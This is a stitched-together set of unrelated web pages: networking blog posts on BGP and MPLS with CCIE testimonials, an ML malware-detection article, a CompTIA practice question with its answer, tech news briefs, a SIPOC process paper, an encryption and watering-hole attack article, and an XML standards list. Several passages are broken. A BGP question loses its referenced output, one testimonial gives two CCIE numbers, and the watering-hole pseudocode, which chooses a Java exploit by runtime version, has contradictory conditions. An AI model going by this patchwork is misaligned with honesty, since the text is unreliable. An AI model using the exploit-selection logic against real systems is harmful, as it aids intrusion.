We all know, (or at least after reading the list below, we will know), that BGP uses the following order, to determine the “best” path.
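The top of that order — weight, then local preference, then AS-path length, origin, and MED — can be sketched as a sort key. This is a simplified subset of the full decision process (which also considers locally originated routes, eBGP vs. iBGP, IGP metric to the next hop, and more), with made-up path attributes:

```python
# Simplified sketch of the top of the BGP best-path decision process.
ORIGIN_RANK = {"i": 0, "e": 1, "?": 2}   # IGP beats EGP beats incomplete

def best_path(paths):
    return min(
        paths,
        key=lambda p: (
            -p["weight"],              # higher weight wins
            -p["local_pref"],          # higher local preference wins
            len(p["as_path"]),         # shorter AS path wins
            ORIGIN_RANK[p["origin"]],  # lower origin code wins
            p["med"],                  # lower MED wins
        ),
    )

paths = [
    {"weight": 0, "local_pref": 100, "as_path": [65001, 65002], "origin": "i", "med": 0},
    {"weight": 0, "local_pref": 200, "as_path": [65001, 65002, 65003], "origin": "i", "med": 0},
]
# The second path wins on local preference despite its longer AS path.
print(best_path(paths))
```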
So now for the question. Take a look at the partial output of the show command below:
For each new CCIE Testimonial we are extending the seven years of success sale! Share your INE success story and congratulations to the following new CCIE Testimonials who have extended the sale thus far!
Thomas Fischer, CCIE #26636 – Routing & Switching
I am proud to let you know that I passed my CCIE R&S Lab in Brussels on Aug. 5th. This was my second attempt. I want to express my deepest appreciation for your products. I am a self-paced student, using Vol1 (*****), Vol2 (****) and Vol4 (***). Thanks INE, it feels so good to have a social life again :)
Matthew Ayre, CCIE #26654 – Service Provider
Big shout out for INE and their OEQ / lab preparation resources! I just cleared Service Provider on my second attempt, finishing about an hour and a half early. I was ~7% short of passing the first time, using INE 1 & 2 as my primary material, then just drilled down on the finer details reading theory. The workbooks really developed the speed and confidence required to beat the exam!
Prateek Madaan, CCIE #26772 – Security
Had been a long and tough journey. Would really like to thank INE from the Core of my heart for facilitating in imparting the skills required not to just pass the exam but to DESERVE it as well…
There are many workbooks available which I prepared along with INE; I do not want to name or list any one of them, or make any comparisons… But in comparison, INE's Security Workbooks may sound tough compared to others, BUT once you go through these workbooks is when you actually feel you DESERVED the tag rather than just passing it. Each of these workbooks and the tasks test each and every technology in detail and to the dead end…
In my last attempt on Version 2 I was deprived of the number by 1%, still followed and trusted INE workbooks and finally it helped….Today I am more happy not to procure the number but to actually have the feeling of confidence that ‘YES this time I deserve to be a CCIE’ and all due to the exhaustive INE workbooks….
Olusegun Olurotimi Medeyinlo, CCIE #26683 – Routing & Switching
I passed the CCIE R&S Lab in Brussels on my second attempt. I'd like to thank the instructors at INE for their excellent workbooks and blogs. Special thanks to Keith Barker for his encouragement and advice.
Now, I have my own CCIE number #22683.
Congratulations to everyone who passed the CCIE Lab Exam. Our instructors, authors, and staff have been committed to helping you pass your exam for the past seven years and we will continue to make your exam our number one priority. Only at INE.
Many businesses globally – large and small alike – have been converting calls from routing over traditional PSTN carrier trunks – such as E1 & T1 PRI or CAS – to much lower cost, yet still high performance, SIP ITSP (Internet Telephony Service Provider) trunks for years now. INE is no different than your business with regard to this – we have been using SIP trunks in lieu of some traditional PSTN calling for years now as well. In fact, in response to a US Federal Communications Commission subcommittee's exploration on “PSTN Evolution” in December 2009, a representative from the US carrier AT&T described the traditional circuit-switched PSTN as “relics of a by-gone era”, and said that “Due to technological advances, changes in consumer preference, and market forces, the question is when, not if, POTS service and the PSTN over which it is provided will become obsolete” – source: Reuters [emphasis mine].
The challenge however, becomes that every SIP ITSP carrier has a slightly different way of implementing these sorts of trunks, and each has different provider network equipment that you, the customer, must connect to, and interoperate (properly) with. If you are a large national or multinational business, you may for instance sometimes even connect to two or three different types of provider network equipment, between possibly having multiple contracts with multiple carriers, and even sometimes having to deal with different provider equipment within a single carrier’s network.
As you may have noticed, INE does a wide variety of training in the Cisco space. This blog post goes out to all those folks who have recently begun their Cisco training.
This month we delivered new live classes on CCNA and CCNP. We are excited for and encourage our students at every level in their journey. In that light, we have gathered a collection of Video Answers, targeted at the CCNA level, with a few topics leaking into security and CCNP. These videos were primarily created as quick (under 10 minutes each) Video Answers to questions that various learners have had.
Take a look at the list of topics, and if there are 1 or 2 you feel you would benefit from, feel free to enjoy them.
Here are a few of the topics (in no particular order):
- How the network statement really works in IOS
- Setting up SSH
- Initial commands for sanity sake
- NAT with overload
- Router on a stick
- VRFs
In this blog post we are going to review a number of MPLS scaling techniques. Theoretically, the main factors that limit MPLS network growth are:
- IGP Scaling. Route Summarization, the core scaling procedure for all commonly used IGPs, does not work well with MPLS LSPs. We'll discuss the reasons for this and see what solutions are available for deploying MPLS in the presence of IGP route summarization.
- Forwarding State growth. Deploying MPLS TE may be challenging in large networks, as the number of tunnels grows like O(N^2), where N is the number of TE endpoints (typically the number of PE routers). While most networks are not even near the breaking point, we are still going to review techniques that allow MPLS-TE to scale to very large networks (tens of thousands of routers).
- Management Overhead. MPLS requires additional control plane components and therefore is more difficult to manage compared to classic IP networks. This becomes more complicated with the network growth.
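The O(N^2) tunnel growth in the forwarding-state point above is easy to see with a quick calculation (the PE counts are purely illustrative):

```python
# A full mesh of unidirectional MPLS-TE tunnels between N PE routers needs
# N * (N - 1) tunnels, i.e. O(N^2) growth -- doubling the PE count roughly
# quadruples the number of tunnels the network must carry state for.
def full_mesh_tunnels(n_pe):
    return n_pe * (n_pe - 1)

for n in (10, 100, 1000):
    print(n, full_mesh_tunnels(n))
# 10   -> 90
# 100  -> 9900
# 1000 -> 999000
```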
The blog post summarizes some recently developed approaches that address the first two of the above mentioned issues. Before we begin, I would like to thank Daniel Ginsburg for introducing me to this topic back in 2007.
Last week we wrapped up the MPLS bootcamp, and it was a blast! A big shout out to all the students who attended, as well as to the many INE staff who stopped by (you know who you are :). Thank you all.
Here is the topology we used for the class, as we built the network, step by step.
The class was organized and delivered in 30 specific lessons. Here is the “overview” slide from class:
One question that is often asked is how exactly does Infinity determine what is a threat. And I usually have two answers ready, the first one being “magic” (it’s not really magic, but gives me an excuse to wave my hands around), and the second one is “how much time do you have?”
The concept for Infinity and its mathematical underpinnings draw heavily from the field of artificial intelligence, and in particular the subfield of machine learning. The overall principles of machine learning are relatively easy to grasp. Consider the case where you want to train a machine to distinguish between photos of cats and dogs. First, you provide the machine with pictures of cats, and inform the machine that these are in fact photos of cats. Then, you provide a second group of pictures of dogs, and inform the machine that these are dog photos. Ideally, once the machine has seen photos of cats and dogs, it should then be able to look at new photos and determine if the photo is of a cat or dog.
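The train-then-predict workflow just described can be sketched with a toy classifier — here a nearest-centroid model over made-up two-dimensional "photo features". This is only an illustration of the supervised-learning idea, not a real image-recognition pipeline:

```python
# Toy "train then predict" workflow: learn one prototype per class, then
# classify unseen examples by their closest prototype.
def centroid(vectors):
    n = len(vectors)
    return tuple(sum(v[i] for v in vectors) / n for i in range(len(vectors[0])))

def train(labeled_examples):
    # Learn one prototype (an "average photo") per class label.
    return {label: centroid(vectors) for label, vectors in labeled_examples.items()}

def predict(model, vector):
    def dist2(a, b):
        return sum((x - y) ** 2 for x, y in zip(a, b))
    # Classify an unseen example by its closest class prototype.
    return min(model, key=lambda label: dist2(model[label], vector))

# "These are cats" / "these are dogs": labeled training data.
model = train({
    "cat": [(1.0, 4.0), (1.2, 3.8), (0.9, 4.1)],
    "dog": [(4.0, 1.0), (3.8, 1.3), (4.2, 0.9)],
})

# A "photo" the machine has never seen before.
print(predict(model, (1.1, 3.9)))   # cat
```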
While simplistic from a high level, there are an enormous amount of variables that influence the effectiveness of machine learning techniques to solve problems. For example, how does the machine process data? And how much data is enough? How long does it take to process all of the data? These (among many other issues) are nontrivial points that we had to consider when architecting Infinity. To provide further insight into how Infinity learns to detect malware, let’s dive into some of these challenges.
In the case of a machine learning system designed to determine if a photo is of a cat or dog, one critical step that must be resolved is how does one represent a photo to a learning system. One simple approach would be to inform the learning system of the color of every pixel in the image. While this would provide data for a learning system, one could possibly imagine more informative representations of the data. Perhaps we could extract different shapes from the photo, or find locations of eyes or tails, or many other interesting features.
This type of data extraction from raw data is commonly referred to as feature extraction in machine learning nomenclature, and is a part of our Infinity pipeline. Machine learning systems rely heavily on proper feature extraction of data. One familiar axiom of machine learning is “garbage in, garbage out” - meaning if your data representation is poor, then your machine learning system will perform poorly. One could imagine in the example of cat and dog photos, what representation may fall on the side of poor representation, and what may fall on the side of rich representation.
Of course, in our case, instead of dealing with photos of cats and dogs, we deal with malicious and non-malicious files. To determine what we want to extract from files, we have leveraged the expertise of our reverse engineers and data scientists to develop a feature extraction component of Infinity that provides an incredibly rich representation of data for Infinity to digest. In terms of raw data, Infinity can extract well over 1 million different data points that are used to define a sample file. While a human analyst would look at 1 million data points and simply be unable to deal with the volume of information, Infinity is well equipped to handle enormous representations of data. This well designed feature extraction component of Infinity forms the basis of what we feed as training data to our machine learning system.
Another issue that is often discussed in machine learning is exactly how much data is ideal for a learning system to train on before it is considered mature enough to start making decisions. And whatever the determined amount of data is, typically there is a better answer, and that answer is “more”. With that in mind, we designed Infinity to be able to constantly bring in new data. In fact, Infinity can bring in well over 3 million samples a day, and can easily scale to handle considerably larger amounts of data. This constant stream of new data not only provides Infinity with more data to learn from, actively improving the ability of Infinity to detect threats - it also allows Infinity to identify new trends and anomalies occurring in the real world at a real-time pace.
Now that we have an idea of the volume of data Infinity can handle on a day-to-day basis, another important question is how the machine learning component processes huge volumes of data to develop the mathematical models used to identify malware. For those not familiar with the implementation details of machine learning algorithms, many of these techniques require computationally expensive operations. Consider the case where we want a machine learning component to train on 3 million samples. Each sample generates 1 million data points, and say, for the sake of simplicity, each data point is represented by one byte. If we were to construct a matrix containing this data, the matrix itself would be 3,000,000,000,000 bytes (3 TB) of data. And that is just the representation of the data. Factor in the mathematics required to construct models, and one could easily see the need for a total number of calculations on the order of 10,000,000,000,000,000+ (more than ten QUADRILLION). To put this into perspective, the world’s leading supercomputers are measured in terms of petaFLOPS, which are a measure of how many quadrillions of floating point operations can be executed per second.
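The back-of-the-envelope arithmetic is easy to verify:

```python
# Sizing the training matrix described above.
samples = 3_000_000
features_per_sample = 1_000_000
bytes_per_feature = 1  # simplifying assumption from the text

matrix_bytes = samples * features_per_sample * bytes_per_feature
print(matrix_bytes)                 # 3000000000000
print(matrix_bytes / 10**12, "TB")  # 3.0 TB
```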
In order to deal with the large amount of data and required CPU cycles needed to build effective machine learning models, we architected Infinity from the ground up with heavy parallelization at its core. This allows us to easily run enormous calculations quickly and effectively over hundreds to thousands of machines at once, providing tremendous value to our ability to train and evaluate new machine learning models.
Designing Infinity with these three considerations in mind has allowed us to develop a world-class machine learning infrastructure. And as Infinity continues to grow, learn, and improve, our underlying architecture provides the means to continue to scale to meet the demands of ever-expanding data. Now we can revisit the original question in this context: How does Infinity determine what is a threat? Infinity has learned by processing massive amounts of malicious and non-malicious data, more data than any human could possibly ever examine on their own. And armed with this extensive knowledge of what is malicious and non-malicious, it can quite easily examine the characteristics of a single file and, ultimately, determine whether that single file has malicious intentions.
We're just getting started, stay tuned for more.
- The Cylance Infinity Team | <urn:uuid:caea47d9-56f5-4be7-8655-b09b38e86d21> | CC-MAIN-2017-04 | https://blog.cylance.com/feeding-infinity | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00322-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943906 | 1,342 | 2.84375 | 3 |
These questions are based on: 220-601 – A+ Essentials CompTIA Self-Test Software Practice Test.
SubObjective: Identify tools, diagnostics procedures and troubleshooting techniques for networks
Single Answer, Multiple Choice
You are the desktop engineer for your company. A user named John reports that he cannot connect his computer to the office Ethernet local area network (LAN). To troubleshoot the problem, you check that the network cable is attached properly at both ends, the port end and the computer's end. The network cable is found to be connected properly.
What should you do next?
- Check whether the link light on the network adapter card (NIC) is on.
- Check whether the NIC is seated properly.
- Check whether the installed NIC is compatible with the computer.
- Check whether the correct driver for the NIC is installed on the computer.
A. Check whether the link light on the network adapter card (NIC) is on.
You should check whether the link light on the NIC is on before performing any major troubleshooting steps. If the link light is on, it indicates that the connection between the NIC and the network exists. If the link light is off, it indicates that there is a problem with either the cable or the NIC.
After checking the link light status, you can perform other troubleshooting steps, such as checking whether the NIC is seated properly in the motherboard slot or whether the NIC is compatible with the computer. You can also check whether the correct driver for the NIC is installed.
Zapper Software, Help, PC Troubleshooting, Network Interface Card, http://www.zappersoftware.com/Help/how-to-troubleshoot-nic.html | <urn:uuid:5c7fb98c-7e7c-4f7c-b8dd-39722650c82b> | CC-MAIN-2017-04 | http://certmag.com/networks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00534-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.841482 | 374 | 2.734375 | 3 |
3-D Rome in 21 Hours
There's an old adage that says "Rome was not built in a day," but a team of researchers at the University of Washington's Graphics and Imaging Laboratory (GRAIL) recently created a virtual Rome in 21 hours using 150,000 panoramic images from the popular user-generated Web site, Flickr.
The project -- described in a research paper presented at the 2009 International Conference on Computer Vision in Kyoto, Japan -- pioneered a method for solving large-scale distributed computer vision problems.
GRAIL researchers developed a new system that uses parallel processing to rapidly match the huge number of individual images that were needed to create the detailed 3-D rendering.
Electronic Weatherproof Protection
Government agencies that spend millions of dollars replacing weather-damaged equipment can sigh with relief, thanks to a new coating process called Golden Shellback, developed by the Northeast Maritime Institute. The coating produces a vacuum deposited film that's nonflammable, has low toxicity and can make electronic devices and other surfaces splash-proof. The process is specifically designed to protect devices commonly used in marine and hazardous environments against damage caused by exposure to moisture, immersion in water, dust, effects of high wind and chemicals. -- Northeast Maritime Institute | <urn:uuid:1338051d-a73c-44b5-b250-c8bf907ba458> | CC-MAIN-2017-04 | http://www.govtech.com/e-government/IT-Trends-Weatherproofing-Electronic-Devices-3-D.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00534-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93187 | 255 | 2.890625 | 3 |
Using SIPOC to Define ITIL® Processes
This white paper describes a technique for defining processes called SIPOC (Suppliers, Inputs, Process Steps, Outputs, and Customers). SIPOC provides a structured way to define the key elements of any process. SIPOC can be used as a means of defining any of the service management processes presented in ITIL® best practices. Furthermore, SIPOC can be used as the preliminary input into the more formal documentation of a process in one of many process design tools.
In this white paper, the process definition using SIPOC is described. SIPOC, a tool often associated with Six Sigma and other quality-improvement activities, is used to define the key elements of a process. SIPOC stands for:
- Suppliers
- Inputs
- Process Steps
- Outputs
- Customers
SIPOC provides a structured method for defining a high-level overview of any process that is focused on the results that the customers of the process receive.
Various Information Technology Infrastructure Library (ITIL®) processes can be defined using SIPOC. In this white paper, we use a simple example that describes definition of a change management process based on ITIL best practices.
This white paper concludes with a brief discussion of next steps once a SIPOC table is completed for a process, specifically, using the information in a SIPOC table to formally document a process in a tool such as Microsoft Visio or IBM WebSphere Business Modeler.
What is SIPOC?
Process definition and improvement efforts often make slow progress because of lack of an adequate tool to show the high-level elements of a process, and how those elements relate to each other. SIPOC is a tool that can be used to define the key elements of a process, as well as how those elements interact with each other. SIPOC provides a visual, end-to-end representation of a process.
SIPOC is an acronym that stands for:
Suppliers: Suppliers are internal or external entities that produce something such as a good, service, or information that is consumed as an input by the process. A process can have one or more suppliers.
Inputs: Inputs are discrete items such as goods, services, or information that are consumed by the process. A process can have one or more inputs.
Process Steps: Process Steps are the structured and specific activities that transform a process's inputs into one or more defined outputs. A process can have one or more steps.
Outputs: Outputs are the intended and actual results of the process. Outputs can include goods, services, information, or other specific units. A process can have one or more outputs.
Customers: Customers are the internal or external entities that receive the value of a process by consuming one or more of its outputs. A process can have one or more customers.
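As a concrete illustration of these five elements, a SIPOC table for a simple change management process can be captured as structured data. The entries below are hypothetical examples, not taken from any specific ITIL process document:

```python
# Hypothetical SIPOC table for an ITIL-style change management process.
sipoc = {
    "Suppliers": ["Service desk", "Application owners", "Infrastructure teams"],
    "Inputs": ["Request for Change (RFC)", "Configuration data", "Release schedule"],
    "Process Steps": [
        "Record the RFC",
        "Assess and categorize the change",
        "Authorize via the Change Advisory Board",
        "Coordinate implementation",
        "Review and close the change",
    ],
    "Outputs": ["Approved or rejected change", "Updated CMDB records", "Change report"],
    "Customers": ["Service owners", "End users", "IT operations"],
}

# Print the table as a high-level overview of the process.
for element, items in sipoc.items():
    print(f"{element}: {', '.join(items)}")
```

Once the five elements are agreed upon, a table like this becomes the preliminary input to more formal process documentation.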
The origin of SIPOC is somewhat of a mystery. There is some evidence that it is related to or based on Deming's system diagram. Additionally, the SIPOC approach is somewhat similar to the input-process-output pattern used in systems analysis and design. Despite all of these links, there is little clear evidence that points to the origin of SIPOC.
Benefits of SIPOC
SIPOC provides an easy-to-learn method of providing a high-level view of a process and its key elements.
Some specific benefits include the following:
- SIPOC provides a way for people who are unfamiliar with a process and the elements of a process to quickly develop a high-level understanding.
- SIPOC also can be used as a way to help people maintain familiarity with a process over time.
- SIPOC often is used in the definition of new processes because it provides an easy-to-use way of organizing and viewing the key aspects of a process. In other words, SIPOC provides an easy-to-use "starting point" for process definition.
- SIPOC helps people understand all of the inputs consumed by a process, as well as all of the outputs created by a process, including those outputs that aren't necessarily desirable.
- SIPOC can be used to document the current state of a process, as well as the desired or future state of a process.
Many process definition and reengineering efforts struggle to get started because of information overload about processes in use. SIPOC helps organizations overcome this information overload roadblock by specifically focusing process definition on its five key elements. | <urn:uuid:88ba2ecd-a026-483e-8064-5f6ecd5d3e24> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/using-sipoc-to-define-itil-processes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00350-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933289 | 929 | 3.09375 | 3 |
Definition: A shared memory model of computation, where typically the processors all execute the same instruction synchronously, and access to any memory location occurs in unit time.
Also known as PRAM.
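As an illustrative sketch (not part of the standard definition), the synchronous model can be simulated sequentially; each pass of the loop below stands in for one PRAM step in which all active processors execute the same instruction, with every memory access assumed to take unit time:

```python
# Illustrative: simulate an O(log n)-step PRAM-style parallel sum.
def pram_sum(values):
    mem = list(values)  # shared memory
    n = len(mem)
    stride = 1
    while stride < n:
        # One synchronous step: every active processor i performs the
        # same instruction, mem[i] = mem[i] + mem[i + stride].
        updates = {i: mem[i] + mem[i + stride]
                   for i in range(0, n - stride, 2 * stride)}
        for i, v in updates.items():
            mem[i] = v
        stride *= 2
    return mem[0]

print(pram_sum([1, 2, 3, 4, 5, 6, 7, 8]))  # 36
```

On n values this takes O(log n) synchronous steps, versus the n - 1 sequential additions a single processor would need.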
See also work-depth model, multiprocessor model.
Note: From Algorithms and Theory of Computation Handbook, page 47-3, Copyright © 1999 by CRC Press LLC. Appearing in the Dictionary of Computer Science, Engineering and Technology, Copyright © 2000 CRC Press LLC.
Entry modified 27 February 2004.
Cite this as:
Algorithms and Theory of Computation Handbook, CRC Press LLC, 1999, "parallel random-access machine", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 27 February 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/parallelRandomAccessMachine.html | <urn:uuid:aad9652b-4e92-4780-930c-92092fd3d7cc> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/parallelRandomAccessMachine.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00194-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.814639 | 247 | 2.546875 | 3 |
Space sometimes looks like a twilight zone to us, but we do not have to go that far to find one. The radiation belts are regions of high-energy particles, mainly protons and electrons, held captive by the magnetic influence of the Earth. They have two main sources. A small but very intense "inner belt" (some call it "the Van Allen Belt" because it was discovered in 1958 by James Van Allen) is trapped within 6500 km or so of the Earth's surface. It consists mainly of high-energy protons (10-50 MeV) and is a by-product of cosmic radiation, a thin drizzle of very fast protons and nuclei which fills all our galaxy. In addition, there exist electrons and protons (and also oxygen particles from the upper atmosphere) given moderate energies (say 1-100 keV) by processes inside the domain of the Earth's magnetic field. Some of these electrons produce the polar aurora ("northern lights") when they hit the upper atmosphere, but many get trapped, and among those, protons and other positive particles carry most of the energy.
Another point of particular interest to high-energy astrophysics is the South Atlantic Anomaly (SAA). We all know that the Earth's magnetic axis is not the same as its rotational axis. As the Earth's molten, ferromagnetic liquid core churns, it generates a magnetic field, and the north-south axis of this field is tilted about 16° from the rotational axis. The north magnetic pole is in the north Canadian islands, but it moves around a lot, and it's currently headed northwest at about 64 km per year. Here's the part that many people don't know. While the north magnetic pole is about 7° from the north rotational pole, the south magnetic pole is about 25° from the south rotational pole. A line drawn from the north magnetic pole to the south does not pass through the center of the Earth. Our magnetic field is torus shaped, like a giant donut around the Earth. But it's not only tilted, it's also pulled to one side, such that one inner surface of the donut is more squished up against the side of the Earth than the other. It's this offset that causes the South Atlantic Anomaly to be at just one spot on the Earth. This is a region of very high particle flux about 250 km above the Atlantic Ocean off the coast of Brazil, and it is a result of the fact that the Earth's rotational and magnetic axes are not aligned. The particle flux is so high in this region that often the detectors on our satellites must be shut off (or at least placed in a "safe" mode) to protect them from the radiation. Below is a map of the SAA at an altitude of around 560 km. The map was produced by ROSAT by monitoring the presence of charged particles. The dark red area shows the extent of the SAA. The green to yellow to orange areas show Earth's particle belts.
The South Atlantic Anomaly comes about because the Earth's field is not completely symmetric. If we were to represent it by a compact magnet (which reproduces the main effect, not the local wiggles), that magnet would not be at the center of the Earth but a few hundred km away, in the direction away from the "anomaly". Thus the anomaly is the region most distant from the "source magnet" and its magnetic field (at any given height) is thus relatively weak. The reason trapped particles don't reach the atmosphere is that they are repelled (sort of) by strong magnetic fields, and the weak field in the anomaly allows them to reach further down than elsewhere.
The shape of this anomaly changes over time. Since its initial discovery in 1958, the southern limits of the SAA have remained roughly constant while a long-term expansion has been measured to the northwest, the north, the northeast, and the east. Additionally, the shape and particle density of the anomaly varies on a diurnal basis, with greatest particle density corresponding roughly to local noon. At an altitude of approximately 500 km, it spans from -50° to 0° geographic latitude and from -90° to +40° longitude. The highest intensity portion of the SAA drifts to the west at a speed of about 0.3 degrees per year. The drift rate is very close to the rotation differential between the Earth's core and its surface, estimated to be between 0.3 and 0.5 degrees per year. Current literature suggests that a slow weakening of the geomagnetic field is one of several causes for the changes in the borders since its discovery. As the geomagnetic field continues to weaken, the inner Van Allen belt gets closer to the Earth, with a commensurate enlargement of the anomaly at given altitudes.
Now, what are the effects of this monster? The South Atlantic Anomaly is of great significance to astronomical satellites and other spacecraft that orbit the Earth at several hundred kilometers altitude; these orbits take satellites through the anomaly periodically, exposing them to several minutes of strong radiation caused by the trapped protons in the inner Van Allen belt. The ISS, orbiting with an inclination of 51.6°, requires extra shielding to deal with this problem. The Hubble Space Telescope does not take observations while passing through this anomaly. Astronauts are also affected by this region, which is said to be the cause of peculiar 'shooting stars' (phosphenes) seen in the visual field of astronauts. One of the current ISS astronauts, Don Pettit, describes these effects in his blog. The eye retina is an amazing structure - it's more impressive than film or a CCD camera chip, and it reacts to more than just light. It also reacts to cosmic rays, which are plentiful in space. When a cosmic ray happens to pass through the retina it causes the rods and cones to fire, and you perceive a flash of light that is really not there. The triggered cells are localized around the spot where the cosmic ray passes, so the flash has some structure. A perpendicular ray appears as a fuzzy dot. A ray at an angle appears as a segmented line. Sometimes the tracks have side branches, giving the impression of an electric spark. The rate or frequency at which these flashes are seen varies with orbital position, Don continues. When passing through the anomaly, where the flux of cosmic rays is 10 to 100 times greater than along the rest of the orbital path, eye flashes will increase from one or two every 10 minutes to several per minute.
Passing through the South Atlantic Anomaly is thought to be the reason for the early failures of the Globalstar network's satellites. The PAMELA experiment, while passing through this anomaly, detected antiproton levels that were orders of magnitude higher than those expected from normal particle decay. This suggests the Van Allen belt confines antiparticles produced by the interaction of the Earth's upper atmosphere with cosmic rays. NASA has reported that modern laptops have crashed when space shuttle flights passed through the anomaly, and Don has confirmed this in his blog, adding that cameras suffer too. During the Apollo missions, astronauts saw these flashes after their eyes had become dark-adapted. When it was dark, they reported a flash every 2.9 minutes on average. Only one Apollo crew member involved in the experiments did not report seeing the phenomenon, Apollo 16's Command Module Pilot Ken Mattingly, who stated that he had poor night vision.
There are experiments on board the ISS to monitor how much radiation the crew is receiving. One experiment is the Phantom Torso, a mummy-looking mock-up of the human body which determines the distribution of radiation doses inside the human body at various tissues and organs.
There’s also the Alpha Magnetic Spectrometer experiment, a particle physics experiment module that is mounted on the ISS. It is designed to search for various types of unusual matter by measuring cosmic rays, and hopefully will also tell us more about the origins of both those crazy flashes seen in space, and also the origins of the Universe.
We know that the South Atlantic Anomaly is hazardous to electronic equipment and to humans who spend time inside it. We know that it dips down close to the Earth. Although the Anomaly is a dangerous place, its edges are pretty well defined. The closest it ever gets to the Earth's surface is about 200 km, and at that height it's very small. Your commercial airplane won't reach that altitude for sure. And with everything we know today about it, it is hardly a twilight zone either.
Credits: NASA, Wikpedia, Don Pettit, Astrobiology Magazine, Brian Dunning | <urn:uuid:95b2f1dc-e1cf-45b2-b2fd-93ce620ad2a2> | CC-MAIN-2017-04 | https://community.emc.com/people/ble/blog/2012/04/29/south-atlantic-anomaly | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00404-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954669 | 1,771 | 3.953125 | 4 |
Encryption isn’t new, but it is gaining new momentum. Used for decades in the financial and defense industries, encryption is on the rise again due in part to recent privacy concerns, aggressive data breaches, and laws regarding the disclosure of those breaches. Organizations from small to large are now seeing encryption technology not just as a nice-to-have but as a must-have.
Encryption has historically been used very narrowly to protect specific kinds of data. Now, though, it is being more ubiquitously deployed. For example, Google and other major email service providers are now encrypting email for their users. Online retailers could not stay in business without encryption. The proliferation of mobile devices has expanded attack surfaces, requiring enterprises to use encryption within their Internet IT systems.
As a multitude of encryption tools are deployed to protect a wide variety of data, these tools tend to create security silos. While a silo is better than no security, it creates added complexity to the security landscape and increases the risk of inconsistency and fragmentation — otherwise known as “encryption sprawl.” The growing popularity of cloud services only deepens the problem. If encryption were standardized, this would not be an issue. Though there are a few widely used encryption algorithms like RSA and AES, the silo effect remains. It’s important to understand what is available and what your organization requires in terms of data security to ensure an encryption strategy that offers the maximum in data protection.
In case you haven’t heard, a new attack vector is a “watering hole” attack. In the real world, you might think of a watering hole attack as one in which a lion waits nearby for other animals to visit a pond for a drink. As a technical attack, it’s not much different. The attacker sets traps on sites that are frequented by individuals/organizations. Once the victim visits the site, the attack is launched.
As an example, some Apple employees were hacked after visiting a developer web site that exploited a vulnerability in the Java browser plug-in, installing malware on their Mac computers. Watering hole attackers can use various techniques to trap their victims. One such technique is designing the malware to look for multiple vulnerabilities:
if version > Java 6 Update 32 or version > Java 7 Update 10 then
    exploit the newest vulnerability (CVE-2013-1493)
else if version <= Java 7 Update 10 then
    exploit an older known Java 7 vulnerability
else (version < Java 6 Update 32)
    exploit an older known Java 6 vulnerability
Notice how the malicious applet checks for the version of JRE and then targets a specific vulnerable version. Attackers use this technique because exploits that may work for one version of vulnerable software may not be effective for another.
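Seen from the defender's side, the same version-gating logic can be inverted into a patch-level check. The sketch below is illustrative only; the `PATCHED` update numbers are hypothetical placeholders, not real patch-level data:

```python
# Illustrative sketch: flag JRE versions that fall below a "first safe update"
# threshold per major version. The thresholds here are hypothetical.
PATCHED = {6: 39, 7: 17}

def parse_jre(version):
    """Parse a version string like '1.7.0_10' into (major, update)."""
    major = int(version.split(".")[1])
    update = int(version.split("_")[1]) if "_" in version else 0
    return major, update

def is_vulnerable(version):
    major, update = parse_jre(version)
    safe_update = PATCHED.get(major)
    if safe_update is None:
        return True  # unknown major version: assume unpatched
    return update < safe_update

print(is_vulnerable("1.7.0_10"))  # True
print(is_vulnerable("1.7.0_21"))  # False
```

An attacker's applet runs the same kind of comparison in reverse, which is why keeping every installed runtime at its latest update matters.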
To prevent these types of attacks, users should make sure their software is up to date and keep anti-malware software current. Also, more companies are now starting to look at using secured, isolated virtual machines; running a web browser in an isolated virtual environment can limit the malware's ability to spread. As with other attacks, a good defense requires a defense-in-depth approach that builds in multiple layers of protection.
Below is a list of community-related XML standards, in alphabetical order.
Atom - An XML Syndication Format, alternative to RSS
The name Atom applies to a pair of related standards: the Atom Syndication Format is an XML language used for web feeds, while the Atom Publishing Protocol (AtomPub or APP for short) is a simple HTTP-based protocol for creating and updating web resources. See also this Atom introduction.
DITA - Darwin Information Typing Architecture
DITA is an XML architecture for designing, writing, managing, and publishing information. DITA is used by EMC Technical Publication groups for product documentation.
DocBook - an XML Document Language Format
DocBook is an XML architecture for writing, managing and publishing information. DocBook is used by EMC Technical Publication groups for product documentation.
DOM - Document Object Model
DOM is a platform- and language-neutral interface that allows programs and scripts to dynamically access and update the content, structure and style of documents.
HR-XML - a collection of schemas for the exchange of data between HR systems.
KML - Keyhole Markup Language
KML is used for displaying data on maps using Google Earth, Google Maps or Microsoft Virtual Earth. Very useful for plotting EMC office locations and staffing levels.
ODF - Open Document Format.
The OpenDocument Format (ODF) is an open XML-based document file format for office applications to be used for documents containing text, spreadsheets, charts, and graphical elements.
OOXML - Office Open XML
The XML format for word processing, spreadsheets and presentations advocated by Microsoft.
RSS - Really Simple Syndication
RSS is a family of web content syndication formats, with the latest being RSS 2.0. See also Atom.
S1000D - An international specification for the procurement and production of technical publications
S1000D is an international standard for technical publishing, utilising a Common Source Database.
The CORENA suite by EMC partner Flatirons supports s1000D.
EMC Documentum Dynamic Delivery Services offers an S1000D Logic Engine.
SAML - Security Assertion Markup Language.
An XML-based framework for communicating user authentication, entitlement, and attribute information, developed by OASIS.
SAX - Simple API for XML.
